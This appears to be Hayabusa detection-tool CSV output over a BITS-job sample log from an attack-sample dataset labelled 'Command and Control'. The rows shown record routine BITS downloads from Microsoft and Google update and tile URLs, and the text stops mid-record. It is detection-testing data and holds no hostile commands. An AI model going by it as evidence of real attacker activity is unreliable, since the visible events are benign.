https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-11 
21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
-2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
-2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: 
http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx -2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component 
Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: 